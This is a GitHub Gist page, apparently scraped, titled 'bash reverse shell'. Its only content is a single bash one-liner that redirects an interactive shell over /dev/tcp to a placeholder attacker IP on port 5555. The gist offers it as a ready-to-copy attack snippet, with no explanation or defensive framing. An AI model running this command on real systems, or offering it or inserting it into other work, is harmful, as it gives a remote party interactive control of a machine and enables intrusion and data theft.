Skip to content

Instantly share code, notes, and snippets.

@yechielb2000
Last active February 18, 2024 23:08
Show Gist options
  • Save yechielb2000/17385cccc8ed8cd914b7a9dadff85b82 to your computer and use it in GitHub Desktop.
Save yechielb2000/17385cccc8ed8cd914b7a9dadff85b82 to your computer and use it in GitHub Desktop.
bash reverse shell
bash -i >& /dev/tcp/<ip>/5555 0>&1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment